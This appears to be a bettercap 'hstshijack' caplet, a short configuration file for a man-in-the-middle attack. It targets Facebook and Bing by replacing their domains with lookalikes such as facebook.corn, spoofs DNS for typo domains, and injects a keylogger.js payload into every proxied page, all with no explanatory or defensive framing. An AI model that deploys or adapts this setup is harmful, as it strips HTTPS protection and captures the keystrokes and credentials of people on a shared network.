# Documentation can be found at https://github.com/bettercap/caplets/blob/master/hstshijack/README.md

set hstshijack.log             /usr/share/bettercap/caplets/hstshijack/ssl.log
set hstshijack.ignore          *
set hstshijack.targets         *.facebook.com, *.bing.com, facebook.com, bing.com
set hstshijack.replacements    *.facebook.corn,*.bing.corn, facebook.corn, bing.corn   
#set hstshijack.blockscripts    facebook.com,*.facebook.com
set hstshijack.obfuscate       false
set hstshijack.encode          false
set hstshijack.payloads        *:/usr/share/bettercap/caplets/hstshijack/payloads/keylogger.js
set http.proxy.script  /usr/share/bettercap/caplets/hstshijack/hstshijack.js
set dns.spoof.domains  wvvw.*,*.corn,*.nel,*.orq

http.proxy  on
dns.spoof   on
